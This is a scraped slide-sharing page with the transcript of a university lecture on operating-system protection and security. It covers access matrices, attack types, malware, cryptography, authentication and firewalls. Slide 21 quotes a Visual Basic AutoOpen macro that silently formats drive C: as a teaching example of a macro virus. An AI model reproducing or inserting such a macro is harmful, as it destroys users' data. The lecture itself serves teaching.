Presentation is loading. Please wait.

Presentation is loading. Please wait.

Lecture 8: protection and security

Similar presentations


Presentation on theme: "Lecture 8: protection and security"— Presentation transcript:

1 Lecture 8: protection and security
Dr. Nermin Hamza

2 Protection

3 Protection Protection refers to mechanisms for controlling the access of programs, processes, or users to the resources defined by a computer system. Modern protection concepts have evolved to increase the reliability of any complex system that makes use of shared resources. A key, principle for protection is the principle of least privilege

4 Domain of Protection A computer system is a collection of processes and objects. By objects, we mean both hardware objects (such as the CPU, memory segments, printers, disks, and tape drives) and software objects (such as files, programs, and semaphores). a protection domain, which specifies the resources that the process may access. The ability to execute an operation on an object is an access right. A domain is a collection of access rights, each of which is an ordered pair <object-name, rights- set>.

5 Domain

6 Domain A domain can be realized in a variety of ways:
Each user may be a domain. In this case, the set of objects that can be accessed depends on the identity of the user. Each process may be a domain. In this case, the set of objects that can be accessed depends on the identity of the process. . Each procedure may be a domain. In this case, the set of objects that can be accessed corresponds to the local variables defined within the procedure.

7 Access Matrix View protection as a matrix (access matrix)
Rows represent domains Columns represent objects Access(i, j) is the set of operations that a process executing in Domaini can invoke on Objectj

8 Access Matrix

9 Use of Access Matrix Access matrix design separates mechanism from policy. Mechanism Operating system provides access-matrix + rules. If ensures that the matrix is only manipulated by authorized agents and that rules are strictly enforced. Policy User dictates policy. Who can access what object and in what mode.

10 Implementation of Access Matrix
Each column = Access-control list for one object Defines who can perform what operation. Domain 1 = Read, Write Domain 2 = Read Domain 3 = Read  Each Row = Capability List (like a key) Fore each domain, what operations allowed on what objects. Object 1 – Read Object 4 – Read, Write, Execute Object 5 – Read, Write, Delete, Copy

11 Access Matrix with Copy Rights

12 Access Matrix With Owner Rights

13 Revocation of Access Rights
In a dynamic protection system, we may sometimes need to revoke access rights to objects shared by different users Access List – Delete access rights from access list. Simple Immediate With an access-list scheme, revocation is easy. The access list is searched for any access rights to be revoked, and they are deleted from the list

14 Revocation of Access Rights
Capability List – Scheme required to locate capability in the system before capability can be revoked. Reacquisition Back-pointers Indirection Keys

15 Security

16 The Security Problem Security must consider external environment of the system, and protect the system resources Intruders (crackers) attempt to breach security Threat is potential security violation Attack is attempt to breach security Attack can be accidental or malicious Easier to protect against accidental than malicious misuse

17 Security Attack Threats تهديد mean anything that can interrupt the operation, functioning, integrity, or availability of a network or system, these can take any forms. Vulnerabilities ثغره are inherent weakness in the design, configuration, implementation, or management of the network or the system that renders it to be susceptible to threats. Attacks هجوم are a specific technique used to exploit the vulnerabilities

18 Security Violations Categories Methods Message modification
Breach of confidentiality Breach of integrity Breach of availability Theft of service Denial of service Methods Masquerading (breach authentication) Replay attack Message modification Man-in-the-middle attack Session hijacking

19 Standard Security Attacks

20 Security Measure Levels
Security must occur at four levels to be effective: Physical Human Avoid social engineering, phishing Operating System Network Security is as week as the weakest chain

21 Program Threats (Cont.)
Viruses Code fragment embedded in legitimate program Very specific to CPU architecture, operating system, applications Usually borne via or as a macro Visual Basic Macro to reformat hard drive Sub AutoOpen() Dim oFS Set oFS = CreateObject(’’Scripting.FileSystemObject’’) vs = Shell(’’c:command.com /k format c:’’,vbHide) End Sub

22 Program Threats (Cont.)
Virus dropper inserts virus onto the system Many categories of viruses, literally many thousands of viruses File Boot Macro Source code Polymorphic Encrypted Stealth Tunneling Multipartite Armored

23 A Boot-sector Computer Virus

24 The Morris Internet Worm

25 Trojan horse : Definition
a Trojan horse is a malicious program that is disguised as legitimate software. Like the gift horse left outside the gates of Troy by the Greeks, Trojan Horses appear to be useful or interesting to an unsuspecting user, but are actually harmful

26 Virus or Worm? Trojan horse programs cannot replicate themselves, in contrast to some other types of malware, like viruses or worms. A Trojan horse can be deliberately attached to otherwise useful software by a cracker, or it can be spread by tricking users into believing that it is a useful program.

27 Cryptography as a Security Tool
Broadest security tool available Source and destination of messages cannot be trusted without cryptography Means to constrain potential senders (sources) and / or receivers (destinations) of messages Based on secrets (keys)

28 Secure Communication over Insecure Medium

29 Some Basic Terminology
plaintext - original message ciphertext - coded message cipher-algorithm : for transforming plaintext to ciphertext key - info used in cipher known only to sender/receiver encipher (encrypt) - converting plaintext to ciphertext decipher (decrypt) - recovering ciphertext from plaintext

30 Encryption Diagram Encryption algorithm Decryption algorithm
Plain Text Cipher Text Plain Text Key Key

31 Cryptography types: Symmetric cipher Asymmetric cipher

32 Also called Secret Key Cryptography (SKC):
Symmetric cryptography : Also called Secret Key Cryptography (SKC): Uses a single key for both encryption and decryption Plain Text Plain Text Cipher Text

33 Also called Public Key Cryptography (PKC):
Asymmetric Cryptography : Also called Public Key Cryptography (PKC): Uses one key for encryption and another for decryption Plain Text Cipher Text Plain Text

34 Security Services: Authentication Confidentiality : Integrity :
Concerned with assuring that a communication is authentic. Confidentiality : Preventing the sensitive information from unauthorized user. Integrity : Preventing the information from modification by unauthorized users. Availability: Assuring that the authorized users have timely access to the information in the system and to the network. Access Control: Ability to limit and control the access to the host systems and applications via communication links. Non-repudiation: Preventing either sender or receiver from denying a transmitted message.

35 User Authentication Crucial to identify user correctly, as protection systems depend on user ID User identity most often established through passwords, can be considered a special case of either keys or capabilities Also can include something user has and /or a user attribute Passwords must be kept secret Frequent change of passwords Use of “non-guessable” passwords Log all invalid access attempts Passwords may also either be encrypted or allowed to be used only once

36 Authentication – Hash Functions
Basis of authentication Creates small, fixed-size block of data (message digest, hash value) from m Hash Function H must be collision resistant on m Must be infeasible to find an m’ ≠ m such that H(m) = H(m’) If H(m) = H(m’), then m = m’ The message has not been modified Common message-digest functions include MD5, which produces a 128-bit hash, and SHA-1, which outputs a 160-bit hash

37 Authentication - MAC Symmetric encryption used in message-authentication code (MAC) authentication algorithm Simple example: MAC defines S(k)(m) = f (k, H(m)) Where f is a function that is one-way on its first argument k cannot be derived from f (k, H(m)) Because of the collision resistance in the hash function, reasonably assured no other message could create the same MAC A suitable verification algorithm is V(k)(m, a) ≡ ( f (k,m) = a) Note that k is needed to compute both S(k) and V(k), so anyone able to compute one can compute the other

38 Authentication – Digital Signature
Based on asymmetric keys and digital signature algorithm Authenticators produced are digital signatures In a digital-signature algorithm, computationally infeasible to derive S(ks ) from V(kv) V is a one-way function Thus, kv is the public key and ks is the private key Consider the RSA digital-signature algorithm Similar to the RSA encryption algorithm, but the key use is reversed Digital signature of message S(ks )(m) = H(m)ks mod N The key ks again is a pair d, N, where N is the product of two large, randomly chosen prime numbers p and q Verification algorithm is V(kv)(m, a) ≡ (akv mod N = H(m)) Where kv satisfies kvks mod (p − 1)(q − 1) = 1

39 Authentication (Cont.)
Why authentication if a subset of encryption? Fewer computations (except for RSA digital signatures) Authenticator usually shorter than message Sometimes want authentication but not confidentiality Signed patches et al Can be basis for non-repudiation

40 Key Distribution Delivery of symmetric key is huge challenge
Sometimes done out-of-band Asymmetric keys can proliferate – stored on key ring Even asymmetric key distribution needs care – man-in-the-middle attack

41 What is a Firewall? A choke point of control and monitoring
Interconnects networks with differing trust Imposes restrictions on network services only authorized traffic is allowed Auditing and controlling access can implement alarms for abnormal behavior Itself immune to penetration Provides perimeter defence

42 Firewalls By conventional definition, a firewall is a partition made of fireproof material designed to prevent the spread of fire from one part of a building to another. firewall isolates organization’s internal net from larger Internet, allowing some packets to pass, blocking others. Internet privately administered 222.22/16

43 Advantages and disadvantages of traditional packet filters
One screening router can protect entire network Can be efficient if filtering rules are kept simple Widely available. Almost any router, even Linux boxes Disadvantages Can possibly be penetrated Cannot enforce some policies. For example, permit certain users. Rules can get complicated and difficult to test

44 Firewall goals: All traffic from outside to inside and vice-versa passes through the firewall. Only authorized traffic, as defined by local security policy, will be allowed to pass. The firewall itself is immune to penetration.

45 Firewalling to Protect Systems and Networks
A network firewall is placed between trusted and untrusted hosts The firewall limits network access between these two security domains Can be tunneled or spoofed Tunneling allows disallowed protocol to travel within allowed protocol (i.e. telnet inside of HTTP) Firewall rules typically based on host name or IP address which can be spoofed Personal firewall is software layer on given host Can monitor / limit traffic to and from the host Application proxy firewall understands application protocol and can control them (i.e. SMTP) System-call firewall monitors all important system calls and apply rules to them (i.e. this program can execute that system call)


Download ppt "Lecture 8: protection and security"

Similar presentations


Ads by Google